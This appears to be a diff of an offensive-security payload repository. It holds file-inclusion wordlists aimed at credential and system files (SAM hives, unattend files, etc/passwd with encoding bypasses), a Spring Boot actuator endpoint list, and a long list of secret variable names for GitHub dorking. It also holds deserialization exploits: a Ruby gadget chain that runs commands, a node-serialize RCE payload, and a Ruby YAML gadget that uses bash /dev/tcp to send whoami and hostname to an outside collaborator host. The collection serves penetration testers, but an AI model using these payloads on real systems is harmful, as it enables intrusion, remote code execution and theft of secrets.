/usr/local/nginx/conf/nginx.conf
/var/log/nginx/error_log
/var/log/nginx/access_log

4521
File Inclusion/Intruders/Traversal.txt Normal file
View File

File diff suppressed because one or more lines are too long

14
File Inclusion/Intruders/Web-files.txt Normal file
View File

@ -0,0 +1,14 @@
/robots.txt
/humans.txt
/style.css
/configuration.php
wp-login.php
wp-admin.php
/wp-content/plugins
/include/config.php
/inc/config.php
/include/mysql.php
/inc/mysql.php
/sites/defaults/settings.php
/phpmyadmin/changelog.php
web.config

212
File Inclusion/Intruders/Windows-files.txt Normal file
View File

@ -0,0 +1,212 @@
C:/$recycle.bin/s-1-5-18/desktop.ini
C:/apache2/log/access.log
C:/apache2/log/access_log
C:/apache2/log/error.log
C:/apache2/log/error_log
C:/apache2/logs/access.log
C:/apache2/logs/access_log
C:/apache2/logs/error.log
C:/apache2/logs/error_log
C:/apache/log/access.log
C:/apache/log/access_log
C:/apache/log/error.log
C:/apache/log/error_log
C:/apache/logs/access.log
C:/apache/logs/access_log
C:\apache\logs\access.log
C:/apache/logs/error.log
C:/apache/logs/error_log
C:\apache\logs\error.log
C:/apache/php/php.ini
C:/boot.ini
C:\boot.ini
C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/home2/bin/stable/apache/php.ini
C:/home/bin/stable/apache/php.ini
C:/inetpub/logs/logfiles
C:/inetpub/wwwroot/global.asa
C:/inetpub/wwwroot/index.asp
C:/inetpub/wwwroot/web.config
C:/log/access.log
C:/log/access_log
C:/log/error.log
C:/log/error_log
C:/log/httpd/access_log
C:/log/httpd/error_log
C:/logs/access.log
C:/logs/access_log
C:/logs/error.log
C:/logs/error_log
C:/logs/httpd/access_log
C:/logs/httpd/error_log
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/mysql/bin/my.ini
C:/mysql/data/hostname.err
C:/mysql/data/mysql.err
C:/mysql/data/mysql.log
C:/mysql/my.cnf
C:/mysql/my.ini
C:\nginx-1.7.4\conf\nginx.conf
C:\nginx-1.7.4\nginx.conf
C:/opt/xampp/logs/access.log
C:/opt/xampp/logs/access_log
C:/opt/xampp/logs/error.log
C:/opt/xampp/logs/error_log
C:/php4/php.ini
C:/php4/sessions/
C:/php5/php.ini
C:/php5/sessions/
C:/php/php.ini
C:/php/sessions/
C:/program files/apache group/apache2/conf/httpd.conf
C:/program files/apachegroup/apache2/conf/httpd.conf
C:/programfiles/apachegroup/apache2/conf/httpd.conf
C:/program files/apache group/apache/conf/httpd.conf
C:/program files/apachegroup/apache/conf/httpd.conf
C:/programfiles/apachegroup/apache/conf/httpd.conf
C:/program files/apache group/apache/logs/access.log
C:/program files/apache group/apache/logs/error.log
C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf
C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log
C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log
C:/program files/filezilla server/filezilla server.xml
C:/program files/mysql/data/hostname.err
C:/program files/mysql/data/mysql-bin.log
C:/program files/mysql/data/mysql.err
C:/program files/mysql/data/mysql.log
C:/program files/mysql/my.cnf
C:/program files/mysql/my.ini
C:/program files/mysql/mysql server 5.0/data/hostname.err
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
C:/program files/mysql/mysql server 5.0/data/mysql.err
C:/program files/mysql/mysql server 5.0/data/mysql.log
C:/program files/mysql/mysql server 5.0/my.cnf
C:/program files/mysql/mysql server 5.0/my.ini
C:/program files/mysql/mysql server 5.1/my.ini
C:/program files (x86)/apache group/apache2/conf/httpd.conf
C:/program files (x86)/apache group/apache/conf/access.log
C:/program files (x86)/apache group/apache/conf/error.log
C:/program files (x86)/apache group/apache/conf/httpd.conf
C:/program files (x86)/filezilla server/filezilla server.xml
C:/program files (x86)/xampp/apache/conf/httpd.conf
C:/program files/xampp/apache/conf/httpd.conf
C:/programfiles/xampp/apache/conf/httpd.conf
C:/program files/xampp/apache/conf/httpd.confetc/passwd
C:/sysprep.inf
C:/sysprep/sysprep.inf
C:/sysprep/sysprep.xml
C:/sysprep.xml
C:/system32/inetsrv/metabase.xml
C:/system volume information/wpsettings.dat
C:/unattended.txt
C:/unattended.xml
C:/unattend.txt
C:/unattend.xml
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:\wamp\apache2\logs\access.log
C:\wamp\apache2\logs\access_log
C:\wamp\apache2\logs\error.log
C:\wamp\apache2\logs\error_log
C:\wamp\logs\access.log
C:\wamp\logs\access_log
C:\wamp\logs\error.log
C:\wamp\logs\error_log
C:/windows/csc/v2.0.6/pq
C:/windows/csc/v2.0.6/sm
C:/windows/debug/netsetup.log
C:/windows/explorer.exe
C:/windows/iis6.log
C:/windows/iis6.log (5,6 or 7)
C:/windows/iis7.log
C:/windows/iis8.log
C:/windows/notepad.exe
C:/windows/panther/setupinfo
C:/windows/panther/setupinfo.bak
C:/windows/panther/sysprep.inf
C:/windows/panther/sysprep.xml
C:/windows/panther/unattended.txt
C:/windows/panther/unattended.xml
C:/windows/panther/unattend/setupinfo
C:/windows/panther/unattend/setupinfo.bak
C:/windows/panther/unattend/sysprep.inf
C:/windows/panther/unattend/sysprep.xml
C:/windows/panther/unattend.txt
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattend.xml
C:/windows/php.ini
C:/windows/repair/sam
C:/windows/repair/security
C:/windows/repair/software
C:/windows/repair/system
C:/windows/system32/config/appevent.evt
C:/windows/system32/config/default.sav
C:/windows/system32/config/regback/default
C:/windows/system32/config/regback/sam
C:/windows/system32/config/regback/security
C:/windows/system32/config/regback/software
C:/windows/system32/config/regback/system
C:/windows/system32/config/sam
C:/windows/system32/config/secevent.evt
C:/windows/system32/config/security.sav
C:/windows/system32/config/software.sav
C:/windows/system32/config/system
C:/windows/system32/config/system.sa
C:/windows/system32/config/system.sav
C:/windows/system32/drivers/etc/hosts
C:/windows/system32/eula.txt
C:/windows/system32/inetsrv/config/applicationhost.config
C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
C:/windows/system32/license.rtf
C:/windows/system32/logfiles/httperr/httperr1.log
C:/windows/system32/sysprep.inf
C:/windows/system32/sysprepsysprep.inf
C:/windows/system32/sysprep/sysprep.xml
C:/windows/system32/sysprepsysprep.xml
C:/windows/system32/sysprepunattended.txt
C:/windows/system32/sysprepunattended.xml
C:/windows/system32/sysprepunattend.txt
C:/windows/system32/sysprepunattend.xml
C:/windows/system32/sysprep.xml
C:/windows/system32/unattended.txt
C:/windows/system32/unattended.xml
C:/windows/system32/unattend.txt
C:/windows/system32/unattend.xml
C:/windows/system.ini
C:/windows/temp/
C:/windows/windowsupdate.log
C:/windows/win.ini
C:/winnt/php.ini
C:/winnt/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
C:/xampp/apache/logs/access.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\access_log
C:/xampp/apache/logs/error.log
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\error_log
C:/xampp/filezillaftp/filezilla server.xml
C:/xampp/filezillaftp/logs
C:/xampp/filezillaftp/logs/access.log
C:/xampp/filezillaftp/logs/error.log
C:/xampp/mercurymail/logs/access.log
C:/xampp/mercurymail/logs/error.log
C:/xampp/mercurymail/mercury.ini
C:/xampp/mysql/data/mysql.err
C:/xampp/phpmyadmin/config.inc
C:/xampp/phpmyadmin/config.inc.php
C:/xampp/phpmyadmin/phpinfo.php
C:/xampp/php/php.ini
C:/xampp/sendmail/sendmail.ini
C:/xampp/sendmail/sendmail.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt

886
File Inclusion/Intruders/dot-slash-PathTraversal_and_LFI_pairing.txt Normal file
View File

File diff suppressed because one or more lines are too long

10
File Inclusion/Intruders/simple-check.txt Normal file
View File

@ -0,0 +1,10 @@
etc/passwd
etc/passwd%00
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
etc%c0%afpasswd
etc%c0%afpasswd%00
C:\boot.ini
C:\WINDOWS\win.ini

6919
File Inclusion/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5839
Google Web Toolkit/index.html Normal file
View File

File diff suppressed because one or more lines are too long

BIN
GraphQL Injection/Images/htb-help.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 21 KiB

6470
GraphQL Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5951
HTTP Parameter Pollution/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5887
Hidden Parameters/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6100
Insecure Deserialization/DotNET/index.html Normal file
View File

File diff suppressed because one or more lines are too long

66
Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb Normal file
View File

@ -0,0 +1,66 @@
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
puts "STEP n"
stub_specification.name rescue nil
puts
class Gem::Source::SpecificFile
def initialize; end
end
specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)
other_specific_file = Gem::Source::SpecificFile.new
puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts
$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
puts "STEP n-2"
$dependency_list.each{} rescue nil
puts
class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end
payload = Marshal.dump(Gem::Requirement.new)
puts "STEP n-3"
Marshal.load(payload) rescue nil
puts
puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end
puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts
require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)

5
Insecure Deserialization/Files/node-serialize.js Normal file
View File

@ -0,0 +1,5 @@
var y = {
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

19
Insecure Deserialization/Files/ruby-serialize.yaml Normal file
View File

@ -0,0 +1,19 @@
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
method_id: :resolve

BIN
Insecure Deserialization/Images/NETNativeFormatters.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 278 KiB

6023
Insecure Deserialization/Java/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5872
Insecure Deserialization/Node/index.html Normal file
View File

File diff suppressed because one or more lines are too long

6124
Insecure Deserialization/PHP/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5809
Insecure Deserialization/Python/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5826
Insecure Deserialization/Ruby/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5959
Insecure Deserialization/YAML/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5856
Insecure Deserialization/index.html Normal file
View File

File diff suppressed because one or more lines are too long

BIN
Insecure Direct Object References/Images/idor.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 175 KiB

6056
Insecure Direct Object References/index.html Normal file
View File

File diff suppressed because one or more lines are too long

52
Insecure Management Interface/Intruder/springboot_actuator.txt Normal file
View File

@ -0,0 +1,52 @@
auditevents
autoconfig
beans
caches
conditions
configprops
dump
env
flyway
health
heapdump
httptrace
info
integrationgraph
jolokia
logfile
loggers
liquibase
metrics
mappings
prometheus
scheduledtasks
sessions
shutdown
threaddump
trace
actuator/auditevents
actuator/autoconfig
actuator/beans
actuator/caches
actuator/conditions
actuator/configprops
actuator/dump
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/logfile
actuator/loggers
actuator/liquibase
actuator/metrics
actuator/mappings
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/threaddump
actuator/trace

5908
Insecure Management Interface/index.html Normal file
View File

File diff suppressed because one or more lines are too long

5958
Insecure Randomness/index.html Normal file
View File

File diff suppressed because one or more lines are too long

1401
Insecure Source Code Management/Files/github-dorks.txt Normal file
View File

@ -0,0 +1,1401 @@
GITHUB_TOKEN=
PATH=
CODECLIMATE_REPO_TOKEN=
DOCKER_PASSWORD=
NPM_TOKEN=
GH_TOKEN=
encrypted_02ddd67d5586_iv=
encrypted_517c5824cb79_key=
encrypted_02ddd67d5586_key=
encrypted_517c5824cb79_iv=
encrypted_1366e420413c_key=
encrypted_1366e420413c_iv=
DOCKER_USERNAME=
ARTIFACTS_SECRET=
ARTIFACTS_KEY=
SURGE_TOKEN=
SURGE_LOGIN=
ARTIFACTS_BUCKET=
SAUCE_ACCESS_KEY=
SAUCE_USERNAME=
DB_USER=
DB_PORT=
DB_HOST=
DBP=
javascriptEnabled=
acceptSslCerts=
AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
DOCKER_EMAIL=
GH_USER_EMAIL=
GH_USER_NAME=
CLOUDINARY_URL=
COVERALLS_REPO_TOKEN=
CF_PASSWORD=
CF_SPACE=
CF_USERNAME=
CF_ORGANIZATION=
WPT_REPORT_API_KEY=
USABILLA_ID=
encrypted_17b59ce72ad7_key=
encrypted_17b59ce72ad7_iv=
NGROK_TOKEN=
rotatable=
CLOUDINARY_URL_STAGING=
encrypted_2c8d10c8cc1d_key=
encrypted_2c8d10c8cc1d_iv=
SRCCLR_API_TOKEN=
NPM_AUTH_TOKEN=
takesScreenshot=
GH_UNSTABLE_OAUTH_CLIENT_SECRET=
GH_OAUTH_CLIENT_SECRET=
GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET=
GH_UNSTABLE_OAUTH_CLIENT_ID=
GH_OAUTH_CLIENT_ID=
GH_NEXT_OAUTH_CLIENT_ID=
GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID=
GH_NEXT_OAUTH_CLIENT_SECRET=
marionette=
NPM_CONFIG_AUDIT=
FTP_PW=
FTP_LOGIN=
NPM_CONFIG_STRICT_SSL=
--ignore-ssl-errors=
TRAVIS_SECURE_ENV_VARS=
FOSSA_API_KEY=
VIP_GITHUB_DEPLOY_KEY=
SIGNING_KEY_SID=
SIGNING_KEY_SECRET=
ACCOUNT_SID=
API_KEY_SID=
API_KEY_SECRET=
CI_DEPLOY_PASSWORD=
CONFIGURATION_PROFILE_SID_SFU=
CONFIGURATION_PROFILE_SID_P2P=
ANACONDA_TOKEN=
CC_TEST_REPORTER_ID=
OS_TENANT_NAME=
OS_TENANT_ID=
OS_PROJECT_NAME=
OS_AUTH_URL=
OS_USERNAME=
OS_PASSWORD=
OS_REGION_NAME=
node_pre_gyp_secretAccessKey=
node_pre_gyp_accessKeyId=
encrypted_a2e547bcd39e_key=
encrypted_a2e547bcd39e_iv=
encrypted_17cf396fcb4f_key=
encrypted_17cf396fcb4f_iv=
datadog_api_key=
accessibilityChecks=
acceptInsecureCerts=
CI_DEPLOY_USERNAME=
cssSelectorsEnabled=
SONATYPE_PASSWORD=
tester_keys_password=
GITHUB_OAUTH_TOKEN=
webStorageEnabled=
locationContextEnabled=
nativeEvents=
handlesAlerts=
databaseEnabled=
browserConnectionEnabled=
applicationCacheEnabled=
hasTouchScreen=
takesHeapSnapshot=
networkConnectionEnabled=
mobileEmulationEnabled=
scope=
ALGOLIA_API_KEY=
encrypted_e05f6ccc270e_key=
encrypted_e05f6ccc270e_iv=
DANGER_GITHUB_API_TOKEN=
PYPI_PASSWORD=
VIP_GITHUB_BUILD_REPO_DEPLOY_KEY=
SSMTP_CONFIG=
COVERITY_SCAN_TOKEN=
CODECOV_TOKEN=
SIGNING_KEY=
GPG_ENCRYPTION=
NEW_RELIC_BETA_TOKEN=
ALGOLIA_APPLICATION_ID=
PACKAGECLOUD_TOKEN=
takesElementScreenshot=
raisesAccessibilityExceptions=
DOCKER_USER=
datadog_app_key=
encrypted_cb02be967bc8_key=
encrypted_cb02be967bc8_iv=
MAPBOX_ACCESS_TOKEN=
GITHUB_DEPLOYMENT_TOKEN=
ROPSTEN_PRIVATE_KEY=
RINKEBY_PRIVATE_KEY=
KOVAN_PRIVATE_KEY=
bintrayUser=
sonatypeUsername=
sonatypePassword=
bintrayKey=
SECRET_1=
SECRET_0=
SECRET_9=
SECRET_8=
SECRET_7=
SECRET_6=
SECRET_5=
SECRET_4=
SECRET_3=
SECRET_2=
SECRET_11=
SECRET_10=
TRAVIS_COM_TOKEN=
AWS_DEFAULT_REGION=
GITHUB_ACCESS_TOKEN=
PYPI_USERNAME=
BINTRAY_APIKEY=
BUNDLE_ZDREPO__JFROG__IO=
COCOAPODS_TRUNK_TOKEN=
OCTEST_SERVER_BASE_URL=
OCTEST_APP_USERNAME=
OCTEST_APP_PASSWORD=
OKTA_CLIENT_TOKEN=
HEROKU_API_KEY=
DATABASE_PASSWORD=
encrypted_0d22c88004c9_key=
encrypted_0d22c88004c9_iv=
BUNDLESIZE_GITHUB_TOKEN=
IOS_DOCS_DEPLOY_TOKEN=
COVERALLS_TOKEN=
CLOUDINARY_URL_EU=
HEROKU_API_USER=
OKTA_CLIENT_ORGURL=
VIRUSTOTAL_APIKEY=
PUSHOVER_USER=
PUSHOVER_TOKEN=
HB_CODESIGN_KEY_PASS=
HB_CODESIGN_GPG_PASS=
isbooleanGood=
BROWSER_STACK_USERNAME=
BROWSER_STACK_ACCESS_KEY=
SNYK_TOKEN=
rTwPXE9XlKoTn9FTWnAqF3MuWaLslDcDKYEh7OaYJjF01piu6g4Nc=
lr7mO294=
NtkUXxwH10BDMF7FMVlQ4zdHQvyZ0=
AURORA_STRING_URL=
TREX_OKTA_CLIENT_TOKEN=
TREX_OKTA_CLIENT_ORGURL=
GPG_PASSPHRASE=
encrypted_5d419efedfca_key=
encrypted_5d419efedfca_iv=
ACCESS_KEY_SECRET=
ACCESS_KEY_ID=
props.disabled=
ALGOLIA_API_KEY_MCM=
BINTRAY_API_KEY=
DOCKER_PASS=
TRIGGER_API_COVERAGE_REPORTER=
FIREBASE_TOKEN=
OSSRH_USERNAME=
7QHkRyCbP98Yv2FTXrJFcx9isA2viFx2UxzTsvXcAKHbCSAw=
dockerhubUsername=
dockerhubPassword=
SECRET_KEY_BASE=
repoToken=
encrypted_28c9974aabb6_key=
encrypted_28c9974aabb6_iv=
SONATYPE_USERNAME=
NGROK_AUTH_TOKEN=
FI2_SIGNING_SEED=
FI2_RECEIVING_SEED=
FI1_SIGNING_SEED=
FI1_RECEIVING_SEED=
CONTENTFUL_ORGANIZATION=
CONTENTFUL_ACCESS_TOKEN=
ANSIBLE_VAULT_PASSWORD=
FIREBASE_PROJECT=
ALGOLIA_SEARCH_API_KEY=
BINTRAY_USER=
encrypted_fb9a491fd14b_key=
encrypted_fb9a491fd14b_iv=
CODACY_PROJECT_TOKEN=
MANAGEMENT_TOKEN=
CONFIGURATION_PROFILE_SID=
NOW_TOKEN=
encrypted_90a9ca14a0f9_key=
encrypted_90a9ca14a0f9_iv=
IJ_REPO_USERNAME=
IJ_REPO_PASSWORD=
GITHUB_KEY=
pLytpSCciF6t9NqqGZYbBomXJLaG84=
encrypted_8a915ebdd931_key=
encrypted_8a915ebdd931_iv=
encrypted_0fb9444d0374_key=
encrypted_0fb9444d0374_iv=
encrypted_b98964ef663e_key=
encrypted_b98964ef663e_iv=
encrypted_50ea30db3e15_key=
encrypted_50ea30db3e15_iv=
SONAR_TOKEN=
API_KEY=
encrypted_a47108099c00_key=
encrypted_a47108099c00_iv=
OSSRH_SECRET=
GH_API_KEY=
PROJECT_CONFIG=
encrypted_f19708b15817_key=
encrypted_f19708b15817_iv=
encrypted_568b95f14ac3_key=
encrypted_568b95f14ac3_iv=
encrypted_4664aa7e5e58_key=
encrypted_4664aa7e5e58_iv=
ORG_GRADLE_PROJECT_SONATYPE_NEXUS_USERNAME=
ORG_GRADLE_PROJECT_SONATYPE_NEXUS_PASSWORD=
encrypted_54c63c7beddf_key=
encrypted_54c63c7beddf_iv=
CONTENTFUL_INTEGRATION_SOURCE_SPACE=
CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN=
BLUEMIX_API_KEY=
UzhH1VoXksrNQkFfc78sGxD0VzLygdDJ7RmkZPeBiHfX1yilToi1yrlRzRDLo46LvSEEiawhTa1i9W3UGr3p4LNxOxJr9tR9AjUuIlP21VEooikAhRf35qK0=
ALGOLIA_APP_ID_MCM=
MAILGUN_PUB_KEY=
MAILGUN_PRIV_KEY=
MAILGUN_DOMAIN=
ALGOLIA_APPLICATION_ID_MCM=
encrypted_1528c3c2cafd_key=
encrypted_1528c3c2cafd_iv=
CASPERJS_TIMEOUT=
COS_SECRETS=
ATOKEN=
PASSWORD=
GITHUB_DEPLOY_HB_DOC_PASS=
COVERITY_SCAN_NOTIFICATION_EMAIL=
CONTENTFUL_CMA_TEST_TOKEN=
DOCKER=
5oLiNgoXIh3jFmLkXfGabI4MvsClZb72onKlJs8WD7VkusgVOrcReD1vkAMv7caaO4TqkMAAuShXiks2oFI5lpHSz0AE1BaI1s6YvwHQFlxbSQJprJd4eeWS9l78mYPJhoLRaWbvf0qIJ29mDSAgAJ7XI=
Q67fq4bD04RMM2RJAS6OOYaBF1skYeJCblwUk=
COVERALLS_API_TOKEN=
MapboxAccessToken=
FIREBASE_API_TOKEN=
TWINE_PASSWORD=
0dysAuQ5KQk=
USERNAME=
encrypted_91ee6a0187b8_key=
encrypted_91ee6a0187b8_iv=
OSSRH_PASS=
OSSRH_USER=
setWindowRect=
SCRUTINIZER_TOKEN=
CLUSTER_NAME=
OC_PASS=
APP_NAME=
GITHUB_API_KEY=
COCOAPODS_TRUNK_EMAIL=
ORG_ID=
OSSRH_JIRA_USERNAME=
OSSRH_JIRA_PASSWORD=
DH_END_POINT_1=
CI_DEPLOY_USER=
CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN=
WEBHOOK_URL=
SLACK_CHANNEL=
APIARY_API_KEY=
=
SONATYPE_USER=
TWINE_USERNAME=
WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY=
SONAR_ORGANIZATION_KEY=
DEPLOY_USER=
SONAR_PROJECT_KEY=
ZZiigPX7RCjq5XHbzUpPpMbC8MFxT2K3jcFXUitfwZvNaZXJIiK3ZQJU4ayKaegLvI91x1SqH0=
encrypted_2620db1da8a0_key=
encrypted_2620db1da8a0_iv=
CLIENT_ID=
AWS_REGION=
AWS_S3_BUCKET=
encrypted_2fb4f9166ccf_key=
encrypted_2fb4f9166ccf_iv=
EXP_USERNAME=
EXP_PASSWORD=
TRAVIS_TOKEN=
ALGOLIA_APPLICATION_ID_2=
ALGOLIA_APPLICATION_ID_1=
ALGOLIA_ADMIN_KEY_2=
ALGOLIA_ADMIN_KEY_1=
PAYPAL_CLIENT_SECRET=
PAYPAL_CLIENT_ID=
EMAIL_NOTIFICATION=
BINTRAY_KEY=
BRACKETS_REPO_OAUTH_TOKEN=
PLACES_APPLICATION_ID=
PLACES_API_KEY=
ARGOS_TOKEN=
encrypted_f50468713ad3_key=
encrypted_f50468713ad3_iv=
EXPORT_SPACE_ID=
encrypted_e44c58426490_key=
encrypted_e44c58426490_iv=
ALGOLIA_APP_ID=
GPG_KEYNAME=
SVN_USER=
SVN_PASS=
ENCRYPTION_PASSWORD=
SPOTIFY_API_CLIENT_SECRET=
SPOTIFY_API_CLIENT_ID=
SPOTIFY_API_ACCESS_TOKEN=
env.HEROKU_API_KEY=
COMPONENT=
URL=
STAR_TEST_SECRET_ACCESS_KEY=
STAR_TEST_LOCATION=
STAR_TEST_BUCKET=
STAR_TEST_AWS_ACCESS_KEY_ID=
ARTIFACTS_AWS_SECRET_ACCESS_KEY=
ARTIFACTS_AWS_ACCESS_KEY_ID=
encrypted_ce33e47ba0cf_key=
encrypted_ce33e47ba0cf_iv=
DEPLOY_DIR=
GITHUB_USERNAME=
aos_sec=
aos_key=
UNITY_USERNAME=
UNITY_SERIAL=
UNITY_PASSWORD=
SONATYPE_NEXUS_PASSWORD=
OMISE_SKEY=
OMISE_PKEY=
GPG_NAME=
GPG_EMAIL=
DOCKER_HUB_PASSWORD=
encrypted_8496d53a6fac_key=
encrypted_8496d53a6fac_iv=
SONATYPE_NEXUS_USERNAME=
CLI_E2E_ORG_ID=
CLI_E2E_CMA_TOKEN=
-DskipTests=
encrypted_42359f73c124_key=
encrypted_42359f73c124_iv=
encrypted_c2c0feadb429_key=
encrypted_c2c0feadb429_iv=
SANDBOX_LOCATION_ID=
SANDBOX_ACCESS_TOKEN=
LOCATION_ID=
ACCESS_TOKEN=
encrypted_f9be9fe4187a_key=
encrypted_f9be9fe4187a_iv=
OSSRH_PASSWORD=
ibCWoWs74CokYVA=
REGISTRY=
GH_REPO_TOKEN=
a=
-Dmaven.javadoc.skip=
CLIENT_SECRET=
encrypted_e7ed02806170_key=
encrypted_e7ed02806170_iv=
ensureCleanSession=
HOCKEYAPP_TOKEN=
GITHUB_AUTH=
uk=
encrypted_fb94579844cb_key=
encrypted_fb94579844cb_iv=
env.SONATYPE_USERNAME=
env.SONATYPE_PASSWORD=
env.GITHUB_OAUTH_TOKEN=
BLUEMIX_USER=
6EpEOjeRfE=
SALESFORCE_BULK_TEST_USERNAME=
SALESFORCE_BULK_TEST_SECURITY_TOKEN=
SALESFORCE_BULK_TEST_PASSWORD=
p8qojUzqtAhPMbZ8mxUtNukUI3liVgPgiMss96sG0nTVglFgkkAkEjIMFnqMSKnTfG812K4jIhp2jCO2Q3NeI=
NPM_API_KEY=
SONATYPE_PASS=
GITHUB_HUNTER_USERNAME=
GITHUB_HUNTER_TOKEN=
SLASH_DEVELOPER_SPACE_KEY=
SLASH_DEVELOPER_SPACE=
0PYg1Q6Qa8BFHJDZ0E8F4thnPFDb1fPnUVIgfKmkE8mnLaQoO7JTHuvyhvyDA=
CYPRESS_RECORD_KEY=
DOCKER_KEY=
encrypted_e733bc65337f_key=
encrypted_e733bc65337f_iv=
GPG_KEY_NAME=
encrypted_0d261e9bbce3_key=
encrypted_0d261e9bbce3_iv=
CI_NAME=
NETLIFY_SITE_ID=
NETLIFY_API_KEY=
encrypted_90a1b1aba54b_key=
encrypted_90a1b1aba54b_iv=
GITHUB_USER=
CLOUDANT_USERNAME=
CLOUDANT_PASSWORD=
EZiLkw9g39IgxjDsExD2EEu8U9jyz8iSmbKsrK6Z4L3BWO6a0gFakBAfWR1Rsb15UfVPYlJgPwtAdbgQ65ElgVeyTdkDCuE64iby2nZeP4=
CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW=
HOMEBREW_GITHUB_API_TOKEN=
GITHUB_PWD=
HUB_DXIA2_PASSWORD=
encrypted_830857fa25dd_key=
encrypted_830857fa25dd_iv=
GCLOUD_PROJECT=
GCLOUD_BUCKET=
FBTOOLS_TARGET_PROJECT=
ALGOLIA_API_KEY_SEARCH=
SENTRY_ENDPOINT=
SENTRY_DEFAULT_ORG=
SENTRY_AUTH_TOKEN=
GITHUB_OAUTH=
FIREBASE_PROJECT_DEVELOP=
DDGC_GITHUB_TOKEN=
INTEGRATION_TEST_APPID=
INTEGRATION_TEST_API_KEY=
OFTA_SECRET=
OFTA_REGION=
OFTA_KEY=
encrypted_27a1e8612058_key=
encrypted_27a1e8612058_iv=
AMAZON_SECRET_ACCESS_KEY=
ISSUER=
REPORTING_WEBDAV_USER=
REPORTING_WEBDAV_URL=
REPORTING_WEBDAV_PWD=
SLACK_ROOM=
encrypted_36455a09984d_key=
encrypted_36455a09984d_iv=
DOCKER_HUB_USERNAME=
CACHE_URL=
TEST=
S3_KEY=
ManagementAPIAccessToken=
encrypted_62cbf3187829_key=
encrypted_62cbf3187829_iv=
BLUEMIX_PASS=
encrypted_0c03606c72ea_key=
encrypted_0c03606c72ea_iv=
uiElement=
NPM_EMAIL=
GITHUB_AUTH_TOKEN=
SLACK_WEBHOOK_URL=
LIGHTHOUSE_API_KEY=
DOCKER_PASSWD=
github_token=
APP_ID=
CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=
encrypted_585e03da75ed_key=
encrypted_585e03da75ed_iv=
encrypted_8382f1c42598_key=
encrypted_8382f1c42598_iv=
CLOUDANT_INSTANCE=
PLOTLY_USERNAME=
PLOTLY_APIKEY=
MAILGUN_TESTDOMAIN=
MAILGUN_PUB_APIKEY=
MAILGUN_APIKEY=
LINODE_VOLUME_ID=
LINODE_INSTANCE_ID=
CLUSTER=
--org=
GPG_SECRET_KEYS=
GPG_OWNERTRUST=
GITHUB_PASSWORD=
DOCKERHUB_PASSWORD=
zenSonatypeUsername=
zenSonatypePassword=
NODE_PRE_GYP_GITHUB_TOKEN=
encrypted_fc666da9e2f5_key=
encrypted_fc666da9e2f5_iv=
